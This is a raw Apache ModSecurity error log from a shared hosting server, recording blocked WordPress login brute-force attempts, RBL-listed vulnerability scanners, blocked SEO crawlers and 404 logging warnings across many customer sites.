[Tue May 26 19:16:23.104478 2026] [security2:error] [pid 26857:tid 26949] [remote 216.73.217.110:44819] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahWkL9foqtHEG_e9i6G6JQAAvVs"]
[Tue May 26 19:16:23.899175 2026] [security2:error] [pid 26857:tid 27078] [client 213.35.106.232:65217] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/wp-includes/option.php"] [unique_id "ahWkL9foqtHEG_e9i6G6SAAAAOA"]
[Tue May 26 19:16:24.756384 2026] [security2:error] [pid 26857:tid 26993] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkMNfoqtHEG_e9i6G6XwAAAIs"]
[Tue May 26 19:16:24.766262 2026] [security2:error] [pid 26857:tid 27016] [client 213.35.106.232:65368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/wp-includes/post.php"] [unique_id "ahWkMNfoqtHEG_e9i6G6fgAAAKI"]
[Tue May 26 19:16:25.762356 2026] [security2:error] [pid 26857:tid 27071] [client 213.35.106.232:65523] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/wp-includes/user.php"] [unique_id "ahWkMdfoqtHEG_e9i6G6sQAAANk"]
[Tue May 26 19:16:26.632002 2026] [security2:error] [pid 26857:tid 26877] [remote 213.171.208.62:41674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWkMtfoqtHEG_e9i6G6zwAA-RM"]
[Tue May 26 19:16:26.911275 2026] [security2:error] [pid 26857:tid 26869] [remote 213.171.208.62:41674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWkMtfoqtHEG_e9i6G65wAAngs"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:16:27.323997 2026] [security2:error] [pid 26857:tid 27028] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkMtfoqtHEG_e9i6G67wAAAK4"]
[Tue May 26 19:16:28.332886 2026] [security2:error] [pid 26857:tid 27076] [client 74.7.175.168:52932] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "mrgtp.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWkNNfoqtHEG_e9i6G7PgAA3h8"]
[Tue May 26 19:16:29.799059 2026] [security2:error] [pid 26857:tid 27018] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkNdfoqtHEG_e9i6G7fwAAAKQ"]
[Tue May 26 19:16:30.366502 2026] [security2:error] [pid 26857:tid 26989] [client 213.35.106.232:49321] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kumarindustry.svijaykumar.in"] [uri "/wp-content/plugins/hello.php"] [unique_id "ahWkNtfoqtHEG_e9i6G7rQAAAIc"]
[Tue May 26 19:16:30.899047 2026] [security2:error] [pid 26857:tid 26991] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkNtfoqtHEG_e9i6G7tgAAAIk"]
[Tue May 26 19:16:32.579961 2026] [security2:error] [pid 26857:tid 26968] [remote 132.148.78.219:57788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWkONfoqtHEG_e9i6G8EAAAq24"]
[Tue May 26 19:16:32.769339 2026] [security2:error] [pid 26857:tid 27028] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkONfoqtHEG_e9i6G8DwAAAK4"]
[Tue May 26 19:16:33.492928 2026] [security2:error] [pid 26857:tid 26961] [remote 132.148.78.219:57788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWkOdfoqtHEG_e9i6G8VAAA1Wc"], referer: https://yndglobal.com/wp-login.php
[Tue May 26 19:16:33.670535 2026] [security2:error] [pid 26857:tid 26967] [remote 51.68.87.127:64066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.87.68.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWkOdfoqtHEG_e9i6G8UwAAzW0"]
[Tue May 26 19:16:34.735737 2026] [security2:error] [pid 26857:tid 27029] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkOtfoqtHEG_e9i6G8cwAAAK8"]
[Tue May 26 19:16:35.150808 2026] [security2:error] [pid 26857:tid 27110] [client 138.229.96.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWkO9foqtHEG_e9i6G8jgAAAQA"], referer: https://www.anujtradingco.com/
[Tue May 26 19:16:35.238655 2026] [security2:error] [pid 26857:tid 26980] [remote 51.68.87.127:64066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.87.68.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahWkO9foqtHEG_e9i6G8kgAAqno"], referer: https://jhonweb.com/wp-login.php
[Tue May 26 19:16:35.247401 2026] [security2:error] [pid 26857:tid 27086] [client 185.191.171.2:24204] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahWkO9foqtHEG_e9i6G8lgAAAOg"]
[Tue May 26 19:16:35.247514 2026] [security2:error] [pid 26857:tid 27086] [client 185.191.171.2:24204] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahWkO9foqtHEG_e9i6G8lgAAAOg"]
[Tue May 26 19:16:36.409759 2026] [security2:error] [pid 26857:tid 27025] [client 138.229.96.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWkPNfoqtHEG_e9i6G80gAAAKs"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1253393&moderation-hash=2252fe51acf9daf310a2852562e689ab
[Tue May 26 19:16:36.517355 2026] [security2:error] [pid 26857:tid 27098] [client 94.23.188.212:33376] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWkPNfoqtHEG_e9i6G84gAAAPQ"]
[Tue May 26 19:16:36.517449 2026] [security2:error] [pid 26857:tid 27098] [client 94.23.188.212:33376] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "samayikprasanga.in"] [uri "/robots.txt"] [unique_id "ahWkPNfoqtHEG_e9i6G84gAAAPQ"]
[Tue May 26 19:16:36.906471 2026] [security2:error] [pid 26857:tid 26884] [remote 46.20.146.46:36010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkPNfoqtHEG_e9i6G88AAAzho"]
[Tue May 26 19:16:37.152439 2026] [security2:error] [pid 26857:tid 27095] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkPNfoqtHEG_e9i6G87gAAAPE"]
[Tue May 26 19:16:37.211706 2026] [security2:error] [pid 26857:tid 26901] [remote 46.20.146.46:36010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkPdfoqtHEG_e9i6G9BAAA7is"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:16:37.324450 2026] [security2:error] [pid 26857:tid 26893] [remote 38.95.35.74:54758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkPdfoqtHEG_e9i6G9AwABAyM"]
[Tue May 26 19:16:37.562248 2026] [security2:error] [pid 26857:tid 26881] [remote 38.95.35.74:54758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkPdfoqtHEG_e9i6G9FQAAqxc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:16:37.910139 2026] [security2:error] [pid 26857:tid 27070] [client 51.161.37.242:40626] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWkPdfoqtHEG_e9i6G9NgAAANg"]
[Tue May 26 19:16:37.910249 2026] [security2:error] [pid 26857:tid 27070] [client 51.161.37.242:40626] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWkPdfoqtHEG_e9i6G9NgAAANg"]
[Tue May 26 19:16:39.074513 2026] [security2:error] [pid 26857:tid 27094] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkPtfoqtHEG_e9i6G9WwAAAPA"]
[Tue May 26 19:16:39.560090 2026] [security2:error] [pid 26857:tid 27076] [client 138.229.96.170:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWkP9foqtHEG_e9i6G9kAAAAN4"], referer: https://anujtradingco.com
[Tue May 26 19:16:40.940922 2026] [security2:error] [pid 26857:tid 27101] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkQNfoqtHEG_e9i6G9vwAAAPc"]
[Tue May 26 19:16:42.048159 2026] [security2:error] [pid 26857:tid 26944] [remote 8.130.10.226:57070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.10.130.8.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkQdfoqtHEG_e9i6G-DQAA6VY"]
[Tue May 26 19:16:43.106878 2026] [security2:error] [pid 26857:tid 26993] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkQtfoqtHEG_e9i6G-NAAAAIs"]
[Tue May 26 19:16:43.406540 2026] [security2:error] [pid 26857:tid 26973] [remote 109.205.180.55:48922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWkQ9foqtHEG_e9i6G-TAAAx3M"]
[Tue May 26 19:16:44.674056 2026] [security2:error] [pid 26857:tid 27064] [client 14.224.3.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkRNfoqtHEG_e9i6G-ggAAANI"]
[Tue May 26 19:16:45.055274 2026] [security2:error] [pid 26857:tid 26988] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkRNfoqtHEG_e9i6G-lwAAAIY"]
[Tue May 26 19:16:47.250520 2026] [security2:error] [pid 26857:tid 27045] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkRtfoqtHEG_e9i6G_DAAAAL8"]
[Tue May 26 19:16:47.382914 2026] [security2:error] [pid 26857:tid 26981] [remote 47.128.42.143:36454] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "christinaspromotions.com"] [uri "/services/promotional-staffing-marketing/"] [unique_id "ahWkR9foqtHEG_e9i6G_LgAAmXs"]
[Tue May 26 19:16:49.183822 2026] [security2:error] [pid 26857:tid 27094] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkSNfoqtHEG_e9i6G_dAAAAPA"]
[Tue May 26 19:16:51.337829 2026] [security2:error] [pid 26857:tid 27006] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkStfoqtHEG_e9i6G_4wAAAJg"]
[Tue May 26 19:16:52.129649 2026] [security2:error] [pid 26857:tid 26938] [remote 121.200.216.55:38764] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkS9foqtHEG_e9i6HAHQAA1lA"]
[Tue May 26 19:16:52.630113 2026] [security2:error] [pid 26857:tid 27024] [client 51.68.247.193:27714] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ameritradeng.com"] [uri "/robots.txt"] [unique_id "ahWkTNfoqtHEG_e9i6HAQwAAAKo"]
[Tue May 26 19:16:52.630231 2026] [security2:error] [pid 26857:tid 27024] [client 51.68.247.193:27714] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ameritradeng.com"] [uri "/robots.txt"] [unique_id "ahWkTNfoqtHEG_e9i6HAQwAAAKo"]
[Tue May 26 19:16:53.348237 2026] [security2:error] [pid 26857:tid 27096] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkTNfoqtHEG_e9i6HAUAAAAPI"]
[Tue May 26 19:16:53.969843 2026] [security2:error] [pid 26857:tid 27012] [client 51.161.65.161:47420] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ameritradeng.com"] [uri "/"] [unique_id "ahWkTdfoqtHEG_e9i6HAjgAAAJ4"]
[Tue May 26 19:16:53.969961 2026] [security2:error] [pid 26857:tid 27012] [client 51.161.65.161:47420] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ameritradeng.com"] [uri "/"] [unique_id "ahWkTdfoqtHEG_e9i6HAjgAAAJ4"]
[Tue May 26 19:16:54.899525 2026] [security2:error] [pid 26857:tid 27028] [client 74.7.244.4:39332] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "homegategardensandsuites.com.ng"] [uri "/cgi-sys/404.html"] [unique_id "ahWkTtfoqtHEG_e9i6HAwQAArgA"]
[Tue May 26 19:16:54.923669 2026] [security2:error] [pid 26857:tid 27105] [client 74.7.230.27:36532] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "homegategardensandsuites.com.ng.thedebateafrica.org"] [uri "/cgi-sys/404.html"] [unique_id "ahWkTtfoqtHEG_e9i6HAxAAA-wM"]
[Tue May 26 19:16:55.200133 2026] [security2:error] [pid 26857:tid 27053] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkTtfoqtHEG_e9i6HAuwAAAMc"]
[Tue May 26 19:16:56.249454 2026] [security2:error] [pid 26857:tid 26865] [remote 154.26.132.116:41860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.132.26.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkUNfoqtHEG_e9i6HA_wAAqgc"]
[Tue May 26 19:16:56.336538 2026] [autoindex:error] [pid 26857:tid 26874] [remote 74.7.241.62:36872] AH01276: Cannot serve directory /home2/debatqhn/homegategardensandsuites.com.ng/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:16:56.666421 2026] [security2:error] [pid 26857:tid 27034] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkUNfoqtHEG_e9i6HBCgAAALQ"]
[Tue May 26 19:16:57.692500 2026] [security2:error] [pid 26857:tid 27092] [client 172.64.198.206:11409] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "lagoslawntennisclub1895.com"] [uri "/wp-admin/install.php"] [unique_id "ahWkUdfoqtHEG_e9i6HBTQAAAO4"]
[Tue May 26 19:16:57.777972 2026] [autoindex:error] [pid 26857:tid 26869] [remote 74.7.227.5:35728] AH01276: Cannot serve directory /home2/debatqhn/homegategardensandsuites.com.ng/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:16:59.357030 2026] [security2:error] [pid 26857:tid 27081] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkUtfoqtHEG_e9i6HBmQAAAOM"]
[Tue May 26 19:17:00.550640 2026] [security2:error] [pid 26857:tid 26922] [remote 31.24.44.107:39940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkVNfoqtHEG_e9i6HB4gAArkA"]
[Tue May 26 19:17:00.869945 2026] [security2:error] [pid 26857:tid 27064] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWkVNfoqtHEG_e9i6HB5wAAANI"]
[Tue May 26 19:17:02.080418 2026] [security2:error] [pid 26857:tid 26952] [remote 31.24.44.107:39940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWkVtfoqtHEG_e9i6HCLAAAj14"], referer: https://freshmindsolutions.com/wp-login.php
